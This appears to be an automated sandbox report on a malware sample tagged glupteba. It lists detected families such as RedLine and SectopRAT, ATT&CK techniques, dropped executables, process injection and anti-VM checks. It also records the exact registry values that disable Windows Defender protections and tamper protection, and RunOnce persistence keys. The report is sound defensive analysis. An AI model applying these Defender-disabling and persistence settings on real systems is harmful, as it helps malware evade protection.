glupteba | 9239fbd8d1a3f690c548416c61b5b7502787a8cda9b789db4f008805b8d6763a

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	6Gb5kN7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	6Gb5kN7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	6Gb5kN7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	6Gb5kN7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	6Gb5kN7.exe

Mystic
Mystic is an infostealer written in C++.
stealer mystic
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 8 IoCs

resource	yara_rule
behavioral1/memory/4696-28-0x0000000000400000-0x000000000043C000-memory.dmp	family_redline
behavioral1/files/0x000a00000001ac05-127.dat	family_redline
behavioral1/files/0x000a00000001ac05-129.dat	family_redline
behavioral1/memory/4592-132-0x0000000000010000-0x000000000002E000-memory.dmp	family_redline
behavioral1/files/0x000800000001ac1a-584.dat	family_redline
behavioral1/files/0x000800000001ac1a-583.dat	family_redline
behavioral1/memory/4280-586-0x0000000000790000-0x00000000007CE000-memory.dmp	family_redline
behavioral1/memory/4944-720-0x0000000000560000-0x00000000005BA000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 3 IoCs

resource	yara_rule
behavioral1/files/0x000a00000001ac05-127.dat	family_sectoprat
behavioral1/files/0x000a00000001ac05-129.dat	family_sectoprat
behavioral1/memory/4592-132-0x0000000000010000-0x000000000002E000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Downloads MZ/PE file

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

pid	Process
1640	netsh.exe

.NET Reactor proctector 20 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/2792-74-0x0000000002080000-0x00000000020A0000-memory.dmp	net_reactor
behavioral1/memory/2792-76-0x0000000002320000-0x000000000233E000-memory.dmp	net_reactor
behavioral1/memory/2792-78-0x0000000002320000-0x0000000002339000-memory.dmp	net_reactor
behavioral1/memory/2792-79-0x0000000002320000-0x0000000002339000-memory.dmp	net_reactor
behavioral1/memory/2792-81-0x0000000002320000-0x0000000002339000-memory.dmp	net_reactor
behavioral1/memory/2792-83-0x0000000002320000-0x0000000002339000-memory.dmp	net_reactor
behavioral1/memory/2792-87-0x0000000002320000-0x0000000002339000-memory.dmp	net_reactor
behavioral1/memory/2792-85-0x0000000002320000-0x0000000002339000-memory.dmp	net_reactor
behavioral1/memory/2792-89-0x0000000002320000-0x0000000002339000-memory.dmp	net_reactor
behavioral1/memory/2792-91-0x0000000002320000-0x0000000002339000-memory.dmp	net_reactor
behavioral1/memory/2792-95-0x0000000002320000-0x0000000002339000-memory.dmp	net_reactor
behavioral1/memory/2792-93-0x0000000002320000-0x0000000002339000-memory.dmp	net_reactor
behavioral1/memory/2792-97-0x0000000002320000-0x0000000002339000-memory.dmp	net_reactor
behavioral1/memory/2792-99-0x0000000002320000-0x0000000002339000-memory.dmp	net_reactor
behavioral1/memory/2792-109-0x0000000002320000-0x0000000002339000-memory.dmp	net_reactor
behavioral1/memory/2792-107-0x0000000002320000-0x0000000002339000-memory.dmp	net_reactor
behavioral1/memory/2792-105-0x0000000002320000-0x0000000002339000-memory.dmp	net_reactor
behavioral1/memory/2792-103-0x0000000002320000-0x0000000002339000-memory.dmp	net_reactor
behavioral1/memory/2792-101-0x0000000002320000-0x0000000002339000-memory.dmp	net_reactor
behavioral1/memory/760-852-0x00000000053E0000-0x000000000545D000-memory.dmp	net_reactor

Executes dropped EXE 21 IoCs

pid	Process
4900	Hd9In64.exe
3920	Js9LV27.exe
916	Aw1Fg24.exe
1472	2wm1893.exe
5100	3hY45iH.exe
5004	4Jw422oZ.exe
64	5jH1Cp0.exe
2792	6Gb5kN7.exe
2120	500F.exe
4592	5271.exe
4960	InstallSetup5.exe
1708	toolspub2.exe
1360	31839b57a4f11171d6abc8bbc4451ee4.exe
4488	Broom.exe
2672	toolspub2.exe
4500	31839b57a4f11171d6abc8bbc4451ee4.exe
4016	AF48.exe
4280	B247.exe
4388	C468.exe
4944	C796.exe
760	CA75.exe

Loads dropped DLL 1 IoCs

pid	Process
4388	C468.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000600000001ac48-4467.dat	upx

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	6Gb5kN7.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	6Gb5kN7.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	9239fbd8d1a3f690c548416c61b5b7502787a8cda9b789db4f008805b8d6763a.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	Hd9In64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	Js9LV27.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	Aw1Fg24.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 1472 set thread context of 4696	1472	2wm1893.exe	77
PID 5100 set thread context of 3724	5100	3hY45iH.exe	80
PID 5004 set thread context of 4128	5004	4Jw422oZ.exe	85
PID 1708 set thread context of 2672	1708	toolspub2.exe	95
PID 4016 set thread context of 4540	4016	AF48.exe	110
PID 4388 set thread context of 2640	4388	C468.exe	111

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	31839b57a4f11171d6abc8bbc4451ee4.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4800	sc.exe
804	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
5084	3724	WerFault.exe	80

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5jH1Cp0.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5jH1Cp0.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5jH1Cp0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
2668	schtasks.exe
2336	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\System\CurrentControlSet	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
64	5jH1Cp0.exe
64	5jH1Cp0.exe
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
2792	6Gb5kN7.exe
2792	6Gb5kN7.exe
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found
3264	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3264	Process not Found

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
64	5jH1Cp0.exe
2672	toolspub2.exe

Suspicious use of AdjustPrivilegeToken 55 IoCs

description	pid	Process
Token: SeDebugPrivilege	2792	6Gb5kN7.exe
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found
Token: SeDebugPrivilege	4592	5271.exe
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found
Token: SeDebugPrivilege	2720	powershell.exe
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found
Token: SeDebugPrivilege	1360	31839b57a4f11171d6abc8bbc4451ee4.exe
Token: SeImpersonatePrivilege	1360	31839b57a4f11171d6abc8bbc4451ee4.exe
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found
Token: SeDebugPrivilege	4860	powershell.exe
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found
Token: SeDebugPrivilege	4280	B247.exe
Token: SeDebugPrivilege	760	CA75.exe
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found
Token: SeDebugPrivilege	4944	C796.exe
Token: SeShutdownPrivilege	3264	Process not Found
Token: SeCreatePagefilePrivilege	3264	Process not Found

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4488	Broom.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1216 wrote to memory of 4900	1216	9239fbd8d1a3f690c548416c61b5b7502787a8cda9b789db4f008805b8d6763a.exe	71
PID 1216 wrote to memory of 4900	1216	9239fbd8d1a3f690c548416c61b5b7502787a8cda9b789db4f008805b8d6763a.exe	71
PID 1216 wrote to memory of 4900	1216	9239fbd8d1a3f690c548416c61b5b7502787a8cda9b789db4f008805b8d6763a.exe	71
PID 4900 wrote to memory of 3920	4900	Hd9In64.exe	72
PID 4900 wrote to memory of 3920	4900	Hd9In64.exe	72
PID 4900 wrote to memory of 3920	4900	Hd9In64.exe	72
PID 3920 wrote to memory of 916	3920	Js9LV27.exe	73
PID 3920 wrote to memory of 916	3920	Js9LV27.exe	73
PID 3920 wrote to memory of 916	3920	Js9LV27.exe	73
PID 916 wrote to memory of 1472	916	Aw1Fg24.exe	75
PID 916 wrote to memory of 1472	916	Aw1Fg24.exe	75
PID 916 wrote to memory of 1472	916	Aw1Fg24.exe	75
PID 1472 wrote to memory of 4160	1472	2wm1893.exe	76
PID 1472 wrote to memory of 4160	1472	2wm1893.exe	76
PID 1472 wrote to memory of 4160	1472	2wm1893.exe	76
PID 1472 wrote to memory of 4696	1472	2wm1893.exe	77
PID 1472 wrote to memory of 4696	1472	2wm1893.exe	77
PID 1472 wrote to memory of 4696	1472	2wm1893.exe	77
PID 1472 wrote to memory of 4696	1472	2wm1893.exe	77
PID 1472 wrote to memory of 4696	1472	2wm1893.exe	77
PID 1472 wrote to memory of 4696	1472	2wm1893.exe	77
PID 1472 wrote to memory of 4696	1472	2wm1893.exe	77
PID 1472 wrote to memory of 4696	1472	2wm1893.exe	77
PID 916 wrote to memory of 5100	916	Aw1Fg24.exe	78
